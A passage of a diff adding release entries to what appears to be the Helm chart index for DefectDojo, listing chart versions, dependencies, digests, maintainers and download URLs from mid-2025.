https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.51.1/defectdojo-1.7.1.tgz + version: 1.7.1 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: DRY cloudsql-proxy + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.52.0-dev + created: "2025-10-14T06:14:44.229004875Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5e5206662efda802ba98b8b27bbd0c711cce3d59d04ef9bef608cb7eceed04a6 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.7.1-dev.tgz + version: 1.7.1-dev + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.51.0 + created: "2025-10-06T17:40:34.766470806Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8a7ccba577a8dc419187c1256c6135fb927704313a7e27b98f8d7025619faa93 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.51.0/defectdojo-1.7.0.tgz + version: 1.7.0 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.51.0-dev + created: "2025-10-06T06:16:12.395995792Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 84fa6edd2ad90e0146f02b46954d8bd5b87dda29071a05a58f0778f6d8080cdb + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.7.0-dev.tgz + version: 1.7.0-dev + - apiVersion: v2 + appVersion: 2.50.4 + created: "2025-09-29T13:50:52.016513719Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 4e6e0333051671d09f75e0c75bfbdefa79cff0cadd72051b458ca12dc6e66325 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.50.4/defectdojo-1.6.209.tgz + version: 1.6.209 + - apiVersion: v2 + appVersion: 2.50.3 + created: "2025-09-22T15:54:25.296056791Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3ae488770cb3603deac463bc13f2fafc6e24fbc61ac07755e99a2c13bad2f239 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.50.3/defectdojo-1.6.208.tgz + version: 1.6.208 + - apiVersion: v2 + appVersion: 2.50.2 + created: "2025-09-15T15:13:26.083467854Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 84b3293ab1bbc0e8859b6126e12455a93114928bdd0eea204f2da2a1b45baa5c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.50.2/defectdojo-1.6.207.tgz + version: 1.6.207 + - apiVersion: v2 + appVersion: 2.50.1 + created: "2025-09-08T14:40:48.130538474Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8f06ca44078c90146de14241ba4c2f95e425862742a9040cc711cf3978b81dea + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.50.1/defectdojo-1.6.206.tgz + version: 1.6.206 + - apiVersion: v2 + appVersion: 2.51.0-dev + created: "2025-09-05T06:13:45.556620974Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3d233a9a5eef35c5285f54bfc02dcfc075ea673b8ffd912da714e7d98423335d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.206-dev.tgz + version: 1.6.206-dev + - apiVersion: v2 + appVersion: 2.50.0 + created: "2025-09-02T14:56:49.359664198Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e65350623be85ae75687a97c714a008f315769b5dc0d3d4d160fc5618abcb17d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.50.0/defectdojo-1.6.205.tgz + version: 1.6.205 + - apiVersion: v2 + appVersion: 2.50.0-dev + created: "2025-08-26T05:17:42.190908621Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: dda18ace2aeaa99e4b615fc35c5a994fc05a1ea263c3a8348c4edb537134f8bd + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.205-dev.tgz + version: 1.6.205-dev + - apiVersion: v2 + appVersion: 2.49.3 + created: "2025-08-25T15:01:11.957704695Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8810f90124bc0fcd6aa7279dfaf81775a1ad2163edaddc4e7cc967b249b1c813 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.49.3/defectdojo-1.6.204.tgz + version: 1.6.204 + - apiVersion: v2 + appVersion: 2.50.0-dev + created: "2025-08-25T06:12:34.846472637Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 77ce5663f0aadb1610b79f96309ed58700fa583d02df543a38c066c2660949fb + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.204-dev.tgz + version: 1.6.204-dev + - apiVersion: v2 + appVersion: 2.49.2 + created: "2025-08-18T19:14:49.219785031Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5ae5231af6bcf4f973c32b2be07e6ed55d7e1b8e0de983eb35b706fb441e12ae + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.49.2/defectdojo-1.6.203.tgz + version: 1.6.203 + - apiVersion: v2 + appVersion: 2.50.0-dev + created: "2025-08-18T06:03:30.345695388Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f2a4eb4d4627be358d01588ca4d73e4592ac6d5ac060a6c8ba471fcf1e88a886 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.203-dev.tgz + version: 1.6.203-dev + - apiVersion: v2 + appVersion: 2.49.1 + created: "2025-08-11T15:08:46.384814996Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 751215565434168adb8f4ce868cbc7d566e4dbd4f92e3b938aaf9fc8f68aab41 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.49.1/defectdojo-1.6.202.tgz + version: 1.6.202 + - apiVersion: v2 + appVersion: 2.50.0-dev + created: "2025-08-11T06:01:35.667481418Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 37a2691ba9a4e2bb4365eedc39bf21c5054aa4fea7953995c10bba72d52d8e73 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.202-dev.tgz + version: 1.6.202-dev + - apiVersion: v2 + appVersion: 2.49.0 + created: "2025-08-04T15:37:16.799756883Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 61b6f0f68c2236e088ee81129dc38563bafa106e63ade52d27aff005997e347e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.49.0/defectdojo-1.6.201.tgz + version: 1.6.201 + - apiVersion: v2 + appVersion: 2.49.0-dev + created: "2025-08-04T06:04:30.268058012Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a7268337c65904c595a3768bf90e8dfc2f05cb6c86496bbe1f5b4855ee54f551 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.201-dev.tgz + version: 1.6.201-dev + - apiVersion: v2 + appVersion: 2.48.5 + created: "2025-07-28T15:21:48.023152675Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 849cfc51d8fa93301813859b5a078e8d25fbebe43b00c6f3b860d27fefce38c9 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.5/defectdojo-1.6.200.tgz + version: 1.6.200 + - apiVersion: v2 + appVersion: 2.49.0-dev + created: "2025-07-28T06:02:54.686857022Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e74419bce73c3cb471d69b788fd28ba15a21539c0866cad8593260c87f9a3113 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.200-dev.tgz + version: 1.6.200-dev + - apiVersion: v2 + appVersion: 2.48.4 + created: "2025-07-22T17:52:55.307907962Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 939cd18c18b82c592c5c6cba905615c2347195b34b1007e51678c93da63e7367 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.4/defectdojo-1.6.199.tgz + version: 1.6.199 + - apiVersion: v2 + appVersion: 2.49.0-dev + created: "2025-07-22T06:11:19.963919432Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 14027a49ce8c22b3b539afacafe0492b3130ea5159a254d3c8ecb0bde6c99a0e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.199-dev.tgz + version: 1.6.199-dev + - apiVersion: v2 + appVersion: 2.48.3 + created: "2025-07-21T21:42:10.224759033Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 70e5b6dfdb26df33a4d8c2ba38d9c9a9a39316386f78e15254dbc32b7499a25a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.3/defectdojo-1.6.198.tgz + version: 1.6.198 + - apiVersion: v2 + appVersion: 2.48.2 + created: "2025-07-21T16:27:04.238006361Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a709f5c2c9410a255969c3e6c9ee59f33fdaa2b08a38dc36208f6be76b95afa7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.2/defectdojo-1.6.197.tgz + version: 1.6.197 + - apiVersion: v2 + appVersion: 2.49.0-dev + created: "2025-07-21T06:15:26.579992532Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5c398a94fa58ffd9f0a88433473dd8927e3ccaf488ba5e1fea5ea68536c3cb5b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.197-dev.tgz + version: 1.6.197-dev + - apiVersion: v2 + appVersion: 2.48.1 + created: "2025-07-14T14:55:51.996935563Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2300d5b0a992a12046bffb29363627f60d0ebeda304447c6e5dc9815fce4e703 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.1/defectdojo-1.6.196.tgz + version: 1.6.196 + - apiVersion: v2 + appVersion: 2.49.0-dev + created: "2025-07-14T06:12:02.083570248Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 32e5362dc59047c753112d2204df9aba5611fbc0375d400b32fe62efef0e31f3 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.196-dev.tgz + version: 1.6.196-dev + - apiVersion: v2 + appVersion: 2.48.0 + created: "2025-07-07T15:55:36.385426766Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f6db0288dd8a6dee96d3969951cd12dd296a4ec0e1f10ff8134fa26fc7b75bf3 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.0/defectdojo-1.6.195.tgz + version: 1.6.195 + - apiVersion: v2 + appVersion: 2.48.0-dev + created: "2025-07-07T06:01:40.87968178Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2059abafd77c39cc51cf1eb2ec7d53377c91a5cc6eb8bacbe504d5e479c4baba + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.195-dev.tgz + version: 1.6.195-dev + - apiVersion: v2 + appVersion: 2.47.4 + created: "2025-07-07T15:35:43.854953113Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3b8a630e0fdb156913ca2a88a6c3a6a1748d7804e7dd5ae0be86171815aeb627 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.48.0/defectdojo-1.6.194.tgz + version: 1.6.194 + - apiVersion: v2 + appVersion: 2.48.0-dev + created: "2025-06-30T06:14:51.942544107Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0c97f452673d85dde1035589c01af0c5916fdd08cc44b4059480503f7897a48b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.194-dev.tgz + version: 1.6.194-dev + - apiVersion: v2 + appVersion: 2.47.3 + created: "2025-06-23T15:43:54.084799363Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c1e94153b0d401d29671743f12a5d0faaa98e3b98920e88be09fe6f9b5692418 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.47.3/defectdojo-1.6.193.tgz + version: 1.6.193 + - apiVersion: v2 + appVersion: 2.48.0-dev + created: "2025-06-23T06:14:39.84598651Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f257550a25564a6e40edf27e3be2f6269f71726042aa4cd6f4457ff8f2b52eaf + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.193-dev.tgz + version: 1.6.193-dev + - apiVersion: v2 + appVersion: 2.47.2 + created: "2025-06-16T14:29:41.956292451Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 596b3d2cf2835b9b2af227d207fb96fd42adb2dbd54cd4e651cfca433b0d0848 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.47.2/defectdojo-1.6.192.tgz + version: 1.6.192 + - apiVersion: v2 + appVersion: 2.48.0-dev + created: "2025-06-16T06:14:39.6920292Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a60b75b0639bca63ba9ca2ba20b56febb0d74525922e127dde47e3ef080014e8 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.192-dev.tgz + version: 1.6.192-dev + - apiVersion: v2 + appVersion: 2.47.1 + created: "2025-06-09T15:03:30.15677714Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c0d8d95b88f47d96618be18f426e956f707d00e1ea097c46a994e22f780eb868 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.47.1/defectdojo-1.6.191.tgz + version: 1.6.191 + - apiVersion: v2 + appVersion: 2.48.0-dev + created: "2025-06-09T06:14:03.710357455Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 36b0094608277d67a1a8053cff8af4a6e4ac6b93a11ca9cbb7a4a87e686d465d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.6.191-dev.tgz + version: 1.6.191-dev + - apiVersion: v2 + appVersion: 2.47.0 + created: "2025-06-02T16:45:22.959860009Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a82b26f7bcfd25a7745a316132db157b2e137c31a8d5a12cf6589f36b0bebc2c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.47.0/defectdojo-1.6.190.tgz + version: 1.6.190 + - apiVersion: v2 + appVersion: 2.47.0-dev + created: "2025-06-02T06:12:29.619997547Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 